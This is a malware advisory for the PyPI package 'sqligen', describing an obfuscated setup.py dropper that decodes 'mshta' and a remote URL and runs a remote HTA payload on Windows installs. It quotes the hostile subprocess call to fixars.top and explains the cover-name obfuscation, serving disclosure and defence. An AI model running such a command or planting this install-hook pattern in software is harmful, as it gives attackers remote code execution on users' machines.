VYPR

pypi · Malicious package advisory

Malware

sqligen

MAL-2026-6515

Malicious code in sqligen (PyPI)

Details


---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (de59ac5884f286d69e42a71ba0cb7b99aa06d2b1f0e28a279a84d3db86eb3196)
setup.py contains an obfuscated install-time dropper that fires on Windows. Two functions with diagnostic-sounding names ('GetDefaultSystemPolicy' / 'CalculateNodeDrift', backed by integer arrays presented as 'InterruptThresholds' and 'ThreadPingLatencies') decode via chr(value+14) arithmetic to the strings 'mshta' and 'https://fixars.top'. On Windows, GetGitCommitHash() runs subprocess.check_output(['mshta', 'https://fixars.top'], shell=True), executing an arbitrary remote HTA payload from fixars.top. This codepath is reached from CustomInstallCommand, CustomBuildPyCommand, and CustomDevelopCommand, so any `pip install sqligen` (or `pip install -e.`) on a Windows host triggers remote code execution under the installing user's account. The obfuscation (cover-story variable names, chr-shift encoding of the command and URL) demonstrates intentional evasion of source review; legitimate build tooling does not encode 'mshta' as 'hardware interrupt latency thresholds'. The fetched payload is attacker-controlled and unrelated to the package's stated SQL-generation purpose.

## Source: kam193 (b84d9f4006cbb5db6790a6de402754f0937758e861efe6ec0bc3ba156415327c)
During installation, the code attempts to download and start a malicious executable.

Likely related to 2025-08-raknet-testing-package.


---

Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.


Campaign: 2026-06-easyaillm


Reasons (based on the campaign):


 - Downloads and executes a remote executable.


 - obfuscation


 - malware


 - tool:mshta

Compromised versions (8)

  • 1.0.0
  • 1.0.5
  • 1.0.6
  • 1.0.7
  • 1.0.8
  • 1.1.1
  • 1.1.3
  • 1.1.4

Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.